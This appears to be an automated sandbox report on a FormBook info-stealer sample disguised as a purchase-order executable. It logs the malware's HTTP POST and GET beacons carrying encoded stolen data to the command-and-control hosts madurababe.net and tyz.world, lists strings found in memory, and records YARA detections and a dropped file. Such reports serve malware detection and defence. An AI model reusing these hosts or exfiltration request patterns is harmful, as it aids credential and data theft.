          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 49 4f 4b 5a 70 65 5f 78 4f 74 6a 68 33 65 46 34 43 36 44 41 76 39 66 38 39 45 69 74 7a 74 6e 33 30 7a 66 35 36 55 4e 58 5a 46 34 76 76 41 36 51 30 58 30 78 68 77 46 65 73 45 6f 4f 7a 41 42 6d 32 63 6f 65 2d 31 2d 52 70 7e 79 55 6b 4c 78 7a 46 75 4b 55 57 67 78 6f 31 4b 33 47 4c 66 68 31 49 4f 72 43 49 77 36 6f 2d 43 62 70 46 37 71 72 61 38 52 4f 6e 72 70 72 77 6f 68 78 35 68 31 7e 30 34 41 50 5a 63 6c 35 55 67 42 46 71 33 6b 6d 51 48 36 36 74 4b 61 51 69 37 77 78 6c 4b 4f 4b 68 45 52 75 4b 71 65 4a 67 35 31 6a 6c 50 55 49 4a 74 64 4f 4e 41 63 52 6d 65 68 61 41 58 67 33 69 47 6b 4c 6b 31 62 35 49 77 6e 50 34 43 74 41 4c 58 4e 48 59 7a 72 44 68 4d 53 33 49 76 57 61 68 55 6d 44 47 4e 74 43 33 79 75 72 78 4f 74 41 52 71 51 32 5a 4f 37 72 37 58 68 44 44 47 4c 28 59 6b 53 55 49 75 6e 56 6d 49 34 28 50 59 36 75 66 61 66 57 35 46 74 47 54 52 72 7e 56 51 33 48 30 62 46 6f 57 4f 76 55 53 32 63 5a 43 52 34 59 52 62 5f 6c 35 70 38 4c 7a 72 73 68 42 39 6b 28 56 7e 64 32 42 42 43 63 57 35 6f 63 37 76 2d 71 4e 73 46 73 30 49 62 73 2d 37 66 72 79 6d 77 75 42 68 7a 39 79 4c 43 70 39 35 37 78 44 41 49 67 39 66 68 45 47 70 2d 4e 5a 7a 70 74 48 43 71 56 32 63 51 44 67 48 42 6b 66 39 6a 4f 70 33 72 59 6c 51 62 77 79 62 76 30 7a 75 46 56 4b 32 59 42 74 67 2d 69 34 72 30 72 45 73 53 49 36 32 4f 48 48 6f 35 54 52 31 41 39 77 6c 34 49 50 76 39 54 46 54 64 4e 36 58 31 75 33 72 4a 63 52 32 4d 6c 6d 4c 78 65 59 74 73 28 36 6a 55 7a 45 37 6c 59 45 6b 2d 4c 6f 42 47 54 32 7a 77 37 47 6e 57 38 45 74 53 39 2d 4a 69 38 6e 41 56 76 75 35 78 71 70 44 62 73 79 68 41 35 77 71 72 56 54 77 68 7a 34 4a 71 4d 37 66 77 6b 6b 55 31 30 33 38 42 73 56 30 41 73 68 33 5f 58 67 64 4a 57 66 47 30 33 35 77 33 67 70 79 42 53 48 64 33 4d 32 32 42 47 4a 39 30 6d 38 78 79 62 46 4d 35 73 57 74 53 69 5a 53 4b 76 63 4e 44 39 45 72 79 31 5a 6f 6d 78 79 55 52 71 4d 6f 41 6b 4c 76 4b 79 34 59 58 5a 49 4d 57 4a 53 6b 75 67 4a 55 4d 37 32 39 67 30 75 47 55 45 50 35 31 68 6a 28 76 58 6d 4e 55 4e 53 45 2d 52 35 45 43 69 36 4b 4f 42 64 50 6f 53 4a 64 30 61 47 35 61 6e 61 4d 46 31 58 77 46 31 6f 50 54 62 38 42 62 36 62 49 55 79 51 71 59 35 69 76 4a 6c 62 79 56 7a 49 58 4d 64 50 4a 42 39 36 49 77 35 56 30 72 66 35 62 44 6e 59 68 34 72 53 37 4c 38 4a 5a 36 6f 30 63 33 6c 31 70 33 74 38 73 53 7a 39 54 4b 33 4e 62 43 43 31 32 7a 4d 34 62 72 68 63 51 48 35 33 70 64 55 51 62 4d 74 67 62 56 52 36 6c 6b 72 61 6d 5a 46 71 6d 79 71 48 76 48 32 67 37 55 61 57 46 4e 55 6a 64 59 6c 49 30 37 32 64 58 6b 71 5f 75 75 55 7a 69 41 4a 71 7e 46 4e 64 38 39 52 45 52 68 46 39 4f 73 72 4c 63 4e 5a 52 53 6e 78
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 09:55:46 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: PO#12108997.exe, 00000000.00000003.241230450.00000000062C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comicta
          Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiono?
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commsed
          Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com~
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnal
          Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
          Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-ca
          Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnt-p
          Source: PO#12108997.exe, 00000000.00000003.243228061.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnu
          Source: PO#12108997.exe, 00000000.00000003.253530830.00000000062F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/L
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/h
          Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
          Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madurababe.net
          Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madurababe.net/p12s/
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com2
          Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242576157.00000000062DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 00000011.00000002.504685915.000000000558F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD
          Source: unknownHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
          Source: unknownDNS traffic detected: queries for: www.tyz.world
          Source: global trafficHTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1Host: www.tyz.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1Host: www.madurababe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Detected FormBook malware
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.iniJump to dropped file
